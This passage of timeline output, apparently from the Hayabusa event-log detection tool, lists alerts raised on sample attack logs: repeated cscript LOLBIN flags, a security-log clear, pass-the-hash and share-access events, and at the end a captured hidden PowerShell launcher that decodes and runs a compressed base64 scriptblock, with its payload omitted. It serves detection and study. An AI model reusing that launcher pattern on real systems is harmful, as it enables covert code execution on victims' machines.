0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with 
service over SMB (GLOBAL).evtx" 2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload 
via process execution.evtx 2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with 
service over SMB (GLOBAL).evtx" 2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload 
via process execution.evtx 2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - 
MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''<base64 payload omitted>''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''<base64 payload omitted>''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWi
